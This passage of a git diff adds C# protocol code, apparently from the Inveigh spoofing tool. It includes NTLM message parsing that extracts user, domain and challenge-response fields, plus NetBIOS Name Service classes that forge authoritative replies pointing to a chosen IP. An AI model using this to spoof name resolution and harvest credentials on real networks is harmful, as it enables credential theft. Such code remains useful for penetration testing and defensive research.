return spnegoNegTokenResp; + } + + private void ParseValues() + { + this.DomainName = new byte[this.DomainNameLen]; + Buffer.BlockCopy(this.Payload, (int)(this.DomainNameBufferOffset - 88), this.DomainName, 0, this.DomainNameLen); + this.UserName = new byte[this.UserNameLen]; + Buffer.BlockCopy(this.Payload, (int)(this.UserNameBufferOffset - 88), this.UserName, 0, this.UserNameLen); + this.Workstation = new byte[this.WorkstationLen]; + Buffer.BlockCopy(this.Payload, (int)(this.WorkstationBufferOffset - 88), this.Workstation, 0, this.WorkstationLen); + this.EncryptedRandomSessionKey = new byte[this.EncryptedRandomSessionKeyLen]; + Buffer.BlockCopy(this.Payload, (int)(this.EncryptedRandomSessionKeyBufferOffset - 88), this.EncryptedRandomSessionKey, 0, this.EncryptedRandomSessionKeyLen); + this.LmChallengeResponse = new byte[this.LmChallengeResponseLen]; + Buffer.BlockCopy(this.Payload, (int)(this.LmChallengeResponseBufferOffset - 88), this.LmChallengeResponse, 0, this.LmChallengeResponseLen); + this.NtChallengeResponse = new byte[this.NtChallengeResponseLen]; + Buffer.BlockCopy(this.Payload, (int)(this.NtChallengeResponseBufferOffset - 88), this.NtChallengeResponse, 0, this.NtChallengeResponseLen); + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMAVPair.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMAVPair.cs new file mode 100644 index 0000000..fc25d20 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMAVPair.cs @@ -0,0 +1,128 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Text; +using System.IO; + +namespace Quiddity.NTLM +{ + class NTLMAVPair + { + //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/83f5e789-660d-4781-8491-5f8c6641f75e + public ushort AvId { get; set; } + public ushort AvLen { get; set; } + public byte[] Value { get; set; } + + public NTLMAVPair() + { + this.AvId = 0; + this.AvLen = 0; + this.Value = new byte[0]; + } + + public byte[] GetBytes(string netBIOSDomainName, string netBIOSComputerName, string dnsDomainName, string dnsComputerName, string dnsTreeName, byte[] timestamp) + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + + if (!String.IsNullOrEmpty(netBIOSDomainName)) + { + this.AvId = 2; + this.Value = Encoding.Unicode.GetBytes(netBIOSDomainName); + this.AvLen = (ushort)this.Value.Length; + packetWriter.Write(this.AvId); + packetWriter.Write(this.AvLen); + packetWriter.Write(this.Value); + } + + if (!String.IsNullOrEmpty(netBIOSComputerName)) + { + this.AvId = 1; + this.Value = Encoding.Unicode.GetBytes(netBIOSComputerName); + this.AvLen = (ushort)this.Value.Length; + packetWriter.Write(this.AvId); + packetWriter.Write(this.AvLen); + packetWriter.Write(this.Value); + } + + if (!String.IsNullOrEmpty(dnsDomainName)) + { + this.AvId = 4; + this.Value = Encoding.Unicode.GetBytes(dnsDomainName); + this.AvLen = (ushort)this.Value.Length; + packetWriter.Write(this.AvId); + packetWriter.Write(this.AvLen); + packetWriter.Write(this.Value); + } + + if (!String.IsNullOrEmpty(dnsComputerName)) + { + this.AvId = 3; + this.Value = Encoding.Unicode.GetBytes(dnsComputerName); + this.AvLen = (ushort)this.Value.Length; + packetWriter.Write(this.AvId); + packetWriter.Write(this.AvLen); + packetWriter.Write(this.Value); + } + + if (!String.IsNullOrEmpty(dnsTreeName) && !String.Equals(dnsTreeName, netBIOSComputerName)) + { + this.AvId = 5; + this.Value = Encoding.Unicode.GetBytes(dnsTreeName); + this.AvLen = (ushort)this.Value.Length; + packetWriter.Write(this.AvId); + packetWriter.Write(this.AvLen); + packetWriter.Write(this.Value); + } + + this.AvId = 7; + this.Value = timestamp; + this.AvLen = 8; + packetWriter.Write(this.AvId); + packetWriter.Write(this.AvLen); + packetWriter.Write(this.Value); + + this.AvId = 0; + this.AvLen = 0; + packetWriter.Write(this.AvId); + packetWriter.Write(this.AvLen); + + return memoryStream.ToArray(); + } + + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv1Response.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv1Response.cs new file mode 100644 index 0000000..64f2890 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv1Response.cs @@ -0,0 +1,39 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ + +namespace Quiddity.NTLM +{ + class NTLMv1Response + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/b88739c6-1266-49f7-9d22-b13923bd8d66 + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv2ClientChallenge.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv2ClientChallenge.cs new file mode 100644 index 0000000..e2781bc --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv2ClientChallenge.cs @@ -0,0 +1,39 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ + +namespace Quiddity.NTLM +{ + class NTLMv2ClientChallenge + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/aee311d6-21a7-4470-92a5-c4ecb022a87b + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv2Response.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv2Response.cs new file mode 100644 index 0000000..3ff7439 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv2Response.cs @@ -0,0 +1,39 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ + +namespace Quiddity.NTLM +{ + class NTLMv2Response + { + //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/d43e2224-6fc3-449d-9f37-b90b55a29c80 + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSChecker.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSChecker.cs new file mode 100644 index 0000000..03de96d --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSChecker.cs @@ -0,0 +1,76 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.DNS; +using Quiddity.Support; +using System; +using System.Collections.Generic; +using System.Linq; +using System.Net; +using System.Text; + +namespace Quiddity.NetBIOS +{ + class NetBIOSNSChecker : DNSChecker + { + /// method GetBytes returns reply buffer. + public static byte[] GetBytes(NetBIOSNSHeader header, NetBIOSNSQuestion question, uint ttl, string replyIP) + { + byte[] rdata = Utilities.BlockCopy(new byte[2], IPAddress.Parse(replyIP).GetAddressBytes()); + + NetBIOSNSHeader responseHeader = new NetBIOSNSHeader + { + ID = header.ID, + R = true, + Opcode = "0000", + AA = true, + TC = false, + RD = true, + RA = false, + Z = "00", + B = false, + RCode = "0000", + QDCount = 0, + ANCount = 1 + }; + + NetBIOSNSResource resource = new NetBIOSNSResource(); + resource.Name = question.QName; + resource.Type = question.QType; + resource.Class = question.QClass; + resource.TTL = ttl; + resource.RDLength = 6; + resource.RData = rdata; + + return Utilities.BlockCopy(responseHeader.GetBytes(), resource.GetBytes()); + } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSHeader.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSHeader.cs new file mode 100644 index 0000000..d0ae62d --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSHeader.cs @@ -0,0 +1,135 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.DNS; +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.NetBIOS +{ + class NetBIOSNSHeader : DNSHeader + { + // https://datatracker.ietf.org/doc/html/rfc1002 + public bool R { get; set; } // 1 bit + public bool B { get; set; } // 1 bit + public NetBIOSNSHeader() + { + + } + + public NetBIOSNSHeader(byte[] data) + { + ReadBytes(data, 0); + } + + protected override void ReadFlags() + { + string flags = Convert.ToString(BitConverter.ToUInt16(this.Flags, 0), 2).PadLeft(16, '0'); + + if (string.Equals(flags.Substring(0, 1), "1")) + { + this.R = true; + } + + this.Opcode = flags.Substring(1, 4); + + if (string.Equals(flags.Substring(5, 1), "1")) + { + this.AA = true; + } + + if (string.Equals(flags.Substring(6, 1), "1")) + { + this.TC = true; + } + + if (string.Equals(flags.Substring(7, 1), "1")) + { + this.RD = true; + } + + if (string.Equals(flags.Substring(8, 1), "1")) + { + this.RA = true; + } + + this.Z = flags.Substring(9, 2); + + if (string.Equals(flags.Substring(11, 1), "1")) + { + this.B = true; + } + + this.RCode = flags.Substring(12, 4); + } + + protected override void WriteFlags() + { + string flags = this.R ? "1" : "0"; + flags += this.Opcode; + flags += this.AA ? "1" : "0"; + flags += this.TC ? "1" : "0"; + flags += this.RD ? "1" : "0"; + flags += this.RA ? "1" : "0"; + flags += this.Z; + flags += this.B ? "1" : "0"; + flags += this.RCode; + byte[] bytes = new byte[2]; + + for (int i = 0; i < 2; ++i) + { + bytes[i] = Convert.ToByte(flags.Substring(8 * i, 8), 2); + } + + this.Flags = bytes; + } + + public byte[] Parse(uint ttl, string ip, byte[] data, out string name, out string type) + { + this.ReadBytes(data, 0); + name = ""; + type = ""; + + if (this.QDCount == 1 && this.ANCount == 0) + { + NetBIOSNSQuestion question = new NetBIOSNSQuestion(); + question.ReadBytes(data, 12); + NetBIOSNSResource response = new NetBIOSNSResource(); + return response.GetBytes(question, ttl, ip, this.ID); + } + + return null; + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSPacket.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSPacket.cs new file mode 100644 index 0000000..cc4af89 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSPacket.cs @@ -0,0 +1,93 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.Support; +using System; +using System.Collections.Generic; +using System.Linq; +using System.Net; +using System.Text; + +namespace Quiddity.NetBIOS +{ + class NetBIOSNSPacket + { + public NetBIOSNSHeader Header { get; set; } + public NetBIOSNSQuestion Question { get; set; } + public NetBIOSNSResource Resource { get; set; } + + public NetBIOSNSPacket(byte[] data) + { + ReadBytes(data); + } + + public NetBIOSNSPacket ReadBytes(byte[] data) + { + this.Header = new NetBIOSNSHeader(data); + this.Question = new NetBIOSNSQuestion(data); + return this; + } + + public byte[] GetBytes(uint ttl, string replyIP) + { + byte[] rdata = Utilities.BlockCopy(new byte[2], IPAddress.Parse(replyIP).GetAddressBytes()); + + this.Header = new NetBIOSNSHeader + { + ID = this.Header.ID, + R = true, + Opcode = "0000", + AA = true, + TC = false, + RD = true, + RA = false, + Z = "00", + B = false, + RCode = "0000", + QDCount = 0, + ANCount = 1 + }; + + this.Resource = new NetBIOSNSResource + { + Name = this.Question.QName, + Type = this.Question.QType, + Class = this.Question.QClass, + TTL = ttl, + RDLength = 6, + RData = rdata + }; + + return Utilities.BlockCopy(this.Header.GetBytes(), this.Resource.GetBytes()); + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSQuestion.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSQuestion.cs new file mode 100644 index 0000000..546cf01 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSQuestion.cs @@ -0,0 +1,166 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.DNS; +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; +using System.Text.RegularExpressions; + +namespace Quiddity.NetBIOS +{ + class NetBIOSNSQuestion : DNSQuestion + { + public NetBIOSNSQuestion() + { + + } + + public NetBIOSNSQuestion(byte[] data) + { + ReadBytes(data, 12); + } + + protected override string ConvertName() + { + byte[] nameData = new byte[30]; + Buffer.BlockCopy(this.QName, 1, nameData, 0, 30); + string hex = BitConverter.ToString(nameData); + string[] nameArray = hex.Split('-'); + string characters = ""; + + foreach (string character in nameArray) + { + characters += new string(Convert.ToChar(Convert.ToInt16(character, 16)), 1); + } + + if (characters.Contains("CA")) + { + characters = characters.Substring(0, characters.IndexOf("CA")); + } + + int i = 0; + string nameSubstring = ""; + + do + { + byte characterByte = (byte)Convert.ToChar(characters.Substring(i, 1)); + characterByte -= 0x41; + nameSubstring += Convert.ToString(characterByte, 16); + i++; + } + while (i < characters.Length); + + i = 0; + string name = ""; + + do + { + name += (Convert.ToChar(Convert.ToInt16(nameSubstring.Substring(i, 2), 16))); + i += 2; + } + while (i < nameSubstring.Length - 1); + + if (characters.StartsWith("ABAC") && characters.EndsWith("AC")) + { + name = name.Substring(2); + name = name.Substring(0, name.Length - 1); + name = string.Concat("<01><02>", name, "<02>"); + } + + Regex printable = new Regex("[^\x00-\x7F]+"); + + if (printable.IsMatch(name)) + { + return ""; + } + + return name; + } + + protected override string GetType() + { + byte[] typeData = new byte[2]; + Buffer.BlockCopy(this.QName, 31, typeData, 0, 2); + string nbnsQuery = BitConverter.ToString(typeData); + string nbnsQueryType = ""; + + switch (nbnsQuery) + { + + case "41-41": + nbnsQueryType = "00"; + break; + + case "41-42": + nbnsQueryType = "01"; + break; + + case "41-43": + nbnsQueryType = "02"; + break; + + case "41-44": + nbnsQueryType = "03"; + break; + + case "42-4A": + nbnsQueryType = "19"; + break; + + case "43-41": + nbnsQueryType = "20"; + break; + + case "42-4C": + nbnsQueryType = "1B"; + break; + + case "42-4D": + nbnsQueryType = "1C"; + break; + + case "42-4E": + nbnsQueryType = "1D"; + break; + + case "42-4F": + nbnsQueryType = "1E"; + break; + + } + + return nbnsQueryType; + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSResource.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSResource.cs new file mode 100644 index 0000000..0a1aeed --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSResource.cs @@ -0,0 +1,68 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.DNS; +using Quiddity.Support; +using System; +using System.Collections.Generic; +using System.Linq; +using System.Net; +using System.Text; + +namespace Quiddity.NetBIOS +{ + class NetBIOSNSResource : DNSResource + { + + public byte[] GetBytes(NetBIOSNSQuestion requestQuestion, uint ttl, string reply, byte[] id) + { + byte[] rdata = Utilities.BlockCopy(new byte[2], IPAddress.Parse(reply).GetAddressBytes()); + + NetBIOSNSHeader responseHeader = new NetBIOSNSHeader + { + ID = id, + QDCount = 0, + ANCount = 1 + }; + + this.Name = requestQuestion.QName; + this.Type = requestQuestion.QType; + this.Class = requestQuestion.QClass; + this.TTL = ttl; + this.RDLength = 6; + this.RData = rdata; + + return Utilities.BlockCopy(responseHeader.GetBytes(), this.GetBytes()); + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSSessionService.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSSessionService.cs new file mode 100644 index 0000000..5cc61ac --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSSessionService.cs @@ -0,0 +1,82 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights 